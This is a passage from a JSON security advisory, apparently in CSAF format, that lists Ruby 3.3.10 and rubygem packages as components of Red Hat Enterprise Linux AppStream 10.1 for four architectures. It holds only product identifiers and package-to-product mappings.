"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debugsource-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-default-gems-0:3.3.10-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-default-gems-0:3.3.10-12.el10_1.noarch"
},
"product_reference": "ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-devel-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-devel-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-doc-0:3.3.10-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-doc-0:3.3.10-12.el10_1.noarch"
},
"product_reference": "ruby-doc-0:3.3.10-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-libs-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64"
},
"product_reference": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bundler-0:2.5.22-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-bundler-0:2.5.22-12.el10_1.noarch"
},
"product_reference": "rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.aarch64"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.ppc64le"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.s390x"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-0:0.7.1-12.el10_1.x86_64"
},
"product_reference": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-irb-0:1.13.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-irb-0:1.13.1-12.el10_1.noarch"
},
"product_reference": "rubygem-irb-0:1.13.1-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.s390x"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.7.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-0:2.7.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-json-0:2.7.2-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-minitest-0:5.20.0-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-minitest-0:5.20.0-12.el10_1.noarch"
},
"product_reference": "rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-power_assert-0:2.0.3-12.el10_1.noarch"
},
"product_reference": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.s390x"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-0:5.1.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64"
},
"product_reference": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.aarch64"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.ppc64le"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.s390x"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-0:1.7.3-12.el10_1.x86_64"
},
"product_reference": "rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64"
},
"product_reference": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rake-0:13.1.0-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rake-0:13.1.0-12.el10_1.noarch"
},
"product_reference": "rubygem-rake-0:13.1.0-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.aarch64"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.ppc64le"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.s390x"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-0:3.4.0-12.el10_1.x86_64"
},
"product_reference": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64"
},
"product_reference": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch"
},
"product_reference": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rexml-0:3.4.4-12.el10_1.noarch as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rubygem-rexml-0:3.4.4-12.el10_1.noarch"
},
